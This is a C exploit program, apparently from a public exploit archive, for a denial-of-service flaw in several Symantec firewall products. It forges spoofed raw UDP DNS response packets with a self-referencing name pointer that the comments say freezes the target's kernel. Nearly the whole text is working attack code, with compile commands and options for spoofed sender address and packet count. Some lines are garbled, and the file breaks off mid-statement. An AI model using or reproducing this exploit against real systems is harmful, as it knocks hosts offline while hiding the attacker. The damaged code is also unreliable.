|
Symantec Multiple Firewall DNS Response Denial of Service Exploit
|
/* HOD-symantec-firewall-DoS-expl.c:
*
* Symantec Multiple Firewall DNS Response Denial-of-Service
*
* Exploit version 0.1 coded by
*
*
* .::[ houseofdabus ]::.
*
*
*
* Bug discoveried by eEye:
* http://www.eeye.com/html/Research/Advisories/AD20040512B.html
*
* -------------------------------------------------------------------
* Tested on:
* - Symantec Norton Personal Firewall 2004
*
*
* Systems Affected:
* - Symantec Norton Internet Security 2002
* - Symantec Norton Internet Security 2003
* - Symantec Norton Internet Security 2004
* - Symantec Norton Internet Security Professional 2002
* - Symantec Norton Internet Security Professional 2003
* - Symantec Norton Internet Security Professional 2004
* - Symantec Norton Personal Firewall 2002
* - Symantec Norton Personal Firewall 2003
* - Symantec Norton Personal Firewall 2004
* - Symantec Client Firewall 5.01, 5.1.1
* - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
* - Symantec Norton AntiSpam 2004
*
* -------------------------------------------------------------------
* Description:
* eEye Digital Security has discovered a second vulnerability
* in the Symantec firewall product line that can be remotely
* exploited to cause a severe denial-of-service condition on
* systems running a default installation of an affected version
* of the product. By sending a single malicious DNS (UDP port 53)
* response packet to a vulnerable host, an attacker can cause
* the Symantec DNS response validation code to enter an infinite
* loop within the kernel, amounting to a system freeze that requires
* the machine to be physically rebooted in order to restore operation.
*
* -------------------------------------------------------------------
* Compile:
* Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib
* Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib
* Linux : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
* HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int]
*
* -fi:IP From (sender) IP address
* -tp:int To (recipient) port number
* -ti:IP To (recipient) IP address
* -n:int Number of times to send message
*
*/
#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#include
#include /* IP_HDRINCL */
#include
#include
#else
#include
#include
#include
#include
#include
#include
#include
#include
#include
#endif
#define MAX_MESSAGE 4068
#define MAX_PACKET 4096
#define DEFAULT_PORT 53
#define DEFAULT_IP "10.0.0.1"
#define DEFAULT_COUNT 1
#ifndef _WIN32
# define FAR
#endif
/* Define the DNS header */
char dnsreply[] =
"\xc9\x9c" /* Transaction ID */
"\x80\x00" /* Flags (bit 15: response) */
"\x00\x01" /* Number of questions */
"\x00\x01" /* Number of answer RRs */
"\x00\x00" /* Number of authority RRs */
"\x00\x00" /* Number of additional RRs */
"\xC0\x0C"; /* Compressed name pointer to itself */
/* Define the IP header */
typedef struct ip_hdr {
unsigned char ip_verlen; /* IP version & length */
unsigned char ip_tos; /* IP type of service */
unsigned short ip_totallength; /* Total length */
unsigned short ip_id; /* Unique identifier */
unsigned short ip_offset; /* Fragment offset field */
unsigned char ip_ttl; /* Time to live */
unsigned char ip_protocol; /* Protocol */
unsigned short ip_checksum; /* IP checksum */
unsigned int ip_srcaddr; /* Source address */
unsigned int ip_destaddr; /* Destination address */
} IP_HDR, *PIP_HDR, FAR* LPIP_HDR;
/* Define the UDP header */
typedef struct udp_hdr {
unsigned short src_portno; /* Source port number */
unsigned short dst_portno; /* Destination port number */
unsigned short udp_length; /* UDP packet length */
unsigned short udp_checksum; /* UDP checksum (optional) */
} UDP_HDR, *PUDP_HDR;
/* globals */
unsigned long dwToIP, // IP to send to
dwFromIP; // IP to send from (spoof)
unsigned short iToPort, // Port to send to
iFromPort; // Port to send from (spoof)
unsigned long dwCount; // Number of times to send
char strMessage[MAX_MESSAGE]; // Message to send
void
usage(char *progname) {
printf("Usage:\n\n");
printf("%s [-tp:DST-PORT] [-n:int]\n\n", progname);
printf(" -fi:IP From (sender) IP address\n");
printf(" -tp:int To (recipient) open UDP port number:\n");
printf(" 137, 138, 445, 500(default)\n");
printf(" -ti:IP To (recipient) IP address\n");
printf(" -n:int Number of times\n");
exit(1);
}
void
ValidateArgs(int argc, char **argv)
{
int i;
iToPort = 500;
iFromPort = DEFAULT_PORT;
dwToIP = inet_addr(DEFAULT_IP);
dwFromIP = inet_addr(DEFAULT_IP);
dwCount = DEFAULT_COUNT;
memcpy(strMessage, dnsreply, sizeof(dnsreply)-1);
for(i = 1; i 4)
dwFromIP = inet_addr(&argv[i][4]);
break;
default:
usage(argv[0]);
break;
}
break;
case 't':
switch (tolower(argv[i][2])) {
case 'p':
if (strlen(argv[i]) > 4)
iToPort = atoi(&argv[i][4]);
break;
case 'i':
if (strlen(argv[i]) > 4)
dwToIP = inet_addr(&argv[i][4]);
break;
default:
usage(argv[0]);
break;
}
break;
case 'n':
if (strlen(argv[i]) > 3)
dwCount = atol(&argv[i][3]);
break;
default:
usage(argv[0]);
break;
}
}
}
return;
}
/* This function calculates the 16-bit one's complement sum */
/* for the supplied buffer */
unsigned short
checksum(unsigned short *buffer, int size)
{
unsigned long cksum=0;
while (size > 1) {
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if (size) {
cksum += *(unsigned char *)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (unsigned short)(~cksum);
}
int
main(int argc, char **argv)
{
#ifdef _WIN32
WSADATA wsd;
#endif
int s;
#ifdef _WIN32
BOOL bOpt;
#else
int bOpt;
#endif
struct sockaddr_in remote;
IP_HDR ipHdr;
UDP_HDR udpHdr;
int ret;
unsigned long i;
unsigned short iTotalSize,
iUdpSize,
iUdpChecksumSize,
iIPVersion,
iIPSize,
cksum = 0;
char buf[MAX_PACKET],
*ptr = NULL;
#ifdef _WIN32
IN_ADDR addr;
#else
struct sockaddr_in addr;
#endif
printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n");
printf("Bug discoveried by eEye:\n");
printf("http://www.eeye.com/html/Research/Advisories/AD20040512B.html\n\n");
printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");
if (argc , port: %d\n", inet_ntoa(addr), iFromPort);
addr.S_un.S_addr = dwToIP;
printf("[*] To IP: , port: %d\n", inet_ntoa(addr), iToPort);
printf("[*] Count: %d\n", dwCount);
#else
addr.sin_addr.s_addr = dwFromIP;
printf("[*] From IP: , port: %d\n", inet_ntoa(addr.sin_addr), iFromPort);
addr.sin_addr.s_addr = dwToIP;
printf("[*] To IP: , port: %d\n", inet_ntoa(addr.sin_addr), iToPort);
printf("[*] Count: %d\n", dwCount);
#endif
#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {
printf("[-] WSAStartup() failed: %d\n", GetLastError());
return -1;
}
#endif
/* Creating a raw socket */
s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
#ifdef _WIN32
if (s == INVALID_SOCKET) {
printf("[-] WSASocket() failed: %d\n", WSAGetLastError());
return -1;
}
#endif
/* Enable the IP header include option */
#ifdef _WIN32
bOpt = TRUE;
#else
bOpt = 1;
#endif
ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));
#ifdef _WIN32
if (ret == SOCKET_ERROR) {
printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError());
return -1;
}
#endif
/* Initalize the IP header */
iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(dnsreply)-1;
iIPVersion = 4;
iIPSize = sizeof(ipHdr) / sizeof(unsigned long);
ipHdr.ip_verlen = (iIPVersion
|
